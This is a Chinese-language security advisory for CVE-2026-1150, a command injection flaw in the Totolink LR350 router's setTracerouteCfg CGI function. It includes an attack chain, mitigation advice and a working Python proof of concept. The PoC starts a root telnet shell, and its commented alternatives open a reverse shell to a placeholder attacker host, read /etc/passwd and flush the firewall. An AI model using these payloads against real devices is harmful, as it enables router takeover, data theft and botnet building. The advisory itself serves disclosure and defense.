CVE-2026-1150 CVSS 6.3 中危

CVE-2026-1150 Totolink LR350 setTracerouteCfg命令注入漏洞

披露日期: 2026-01-19

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-1150

漏洞类型

命令注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Totolink LR350 9.3.5u.6369_B20220309

漏洞概述

CVE-2026-1150是影响Totolink LR350路由器9.3.5u.6369_B20220309版本的安全漏洞。该漏洞存在于Web管理界面的CGI接口中，具体为/cgi-bin/cstecgi.cgi文件中的setTracerouteCfg函数。攻击者可以通过构造恶意的POST请求，在command参数中注入任意系统命令，从而在路由器上执行任意代码。由于该漏洞可通过网络远程利用，且只需要低权限认证即可实施攻击，因此具有较高的实际威胁性。漏洞利用代码已被公开披露，可能被用于大规模恶意活动，如组建僵尸网络、窃取网络流量或进行中间人攻击等。

技术细节

该漏洞属于典型的命令注入（Command Injection）类型，存在于路由器的Web管理功能中。攻击者利用CGI程序对用户输入验证不严格的缺陷，通过在setTracerouteCfg函数的command参数中注入系统命令分隔符（如分号、管道符等）和恶意命令。由于路由器以root权限运行CGI进程，注入的命令将以最高权限执行。攻击者可以通过发送精心构造的POST请求到/cgi-bin/cstecgi.cgi端点，触发traceroute功能并执行任意系统命令，如反弹shell、下载恶意软件或修改系统配置等。

攻击链分析

STEP 1

步骤1

攻击者发现目标路由器并识别其为Totolink LR350设备

STEP 2

步骤2

攻击者构造包含恶意命令的POST请求，目标是/cgi-bin/cstecgi.cgi端点

STEP 3

步骤3

通过setTracerouteCfg函数的command参数注入系统命令，如反弹shell或下载恶意脚本

STEP 4

步骤4

路由器以root权限执行注入的命令，攻击者获得系统最高权限

STEP 5

步骤5

攻击者建立持久化控制，可用于组建僵尸网络、流量窃取或进一步横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2026-1150 PoC - Totolink LR350 Command Injection
# Target: /cgi-bin/cstecgi.cgi

target_url = "http://target.com/cgi-bin/cstecgi.cgi"

# Malicious payload to execute arbitrary command
payload = {
    "topicurl": "setTracerouteCfg",
    "command": ";telnetd -p 8888 -l /bin/sh;"  # Start telnet server on port 8888
}

try:
    response = requests.post(target_url, data=payload, timeout=10)
    print(f"Status: {response.status_code}")
    print(f"Response: {response.text}")
except Exception as e:
    print(f"Error: {e}")

# Alternative: Reverse shell payload
# "command": ";/bin/bash -c 'exec bash -i &>/dev/tcp/attacker_ip/port <&1'"

# Alternative: Exfiltrate data
# "command": ";cat /etc/passwd > /tmp/pwd.txt"

# Alternative: Disable firewall
# "command": ";iptables -F"

影响范围

Totolink LR350 9.3.5u.6369_B20220309

防御指南

临时缓解措施

在厂商发布修复补丁之前，建议通过防火墙规则限制对路由器Web管理接口的访问，仅允许受信任的IP地址访问。同时建议禁用不必要的远程管理功能，使用本地网络访问路由器。如发现设备已被入侵，应立即断电并恢复出厂设置，重新配置设备。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-1150
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-1150
3 Details https://www.cvedetails.com/cve/CVE-2026-1150/
4 VulDB https://vuldb.com/cve/CVE-2026-1150
5 Link https://lavender-bicycle-a5a.notion.site/TOTOLINK-LR350-setTracerouteCfg-2e453a41781f803494e3e4161a393487?source=copy_link
6 Link https://vuldb.com/?ctiid.341743
7 Link https://vuldb.com/?id.341743
8 Link https://vuldb.com/?submit.735696
9 Link https://www.totolink.net/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表